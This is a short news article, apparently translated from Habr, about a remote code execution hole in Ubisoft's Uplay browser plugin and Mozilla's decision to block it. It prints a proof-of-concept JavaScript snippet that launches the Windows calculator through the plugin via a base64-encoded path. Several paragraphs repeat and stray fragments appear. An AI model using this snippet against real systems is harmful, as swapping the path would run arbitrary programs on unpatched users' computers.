Firefox blocked the Ubisoft Uplay extension
The Uplay program from Ubisoft yesterday revealed a serious vulnerability , which is a backdoor on the computers of millions of users who have installed licensed games from Ubisoft, such as Assassin's Creed, Beowulf, Heroes of Might and Magic VI, Tom Clancy's Splinter Cell and others. Together with the game, Uplay DRM and an extension to the browser were installed on their computer.
So, using a special code through this extension, you can access the user's system from any site .
Demo (as an example, runs the program "Calculator" on your computer) .
Code:
Ubisoft assures that the backdoor was not specifically built into the system, and this is just a mistake in the code. They have already released an updated version of Uplay, which can be downloaded from the official site.
')
But the program is not updated automatically and it is installed on millions of computers, for very many security risks remain. Therefore, Mozilla today decided to completely block the Uplay extension for all users.
So, using a special code through this extension, you can access the user's system from any site .
Demo (as an example, runs the program "Calculator" on your computer) .
Code:
var x = document.createElement('OBJECT'); x.setAttribute("type", "application/x-uplaypc"); document.body.appendChild(x); x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play") Ubisoft assures that the backdoor was not specifically built into the system, and this is just a mistake in the code. They have already released an updated version of Uplay, which can be downloaded from the official site.
')
But the program is not updated automatically and it is installed on millions of computers, for very many security risks remain. Therefore, Mozilla today decided to completely block the Uplay extension for all users.
Source: https://habr.com/ru/post/148792/
All Articles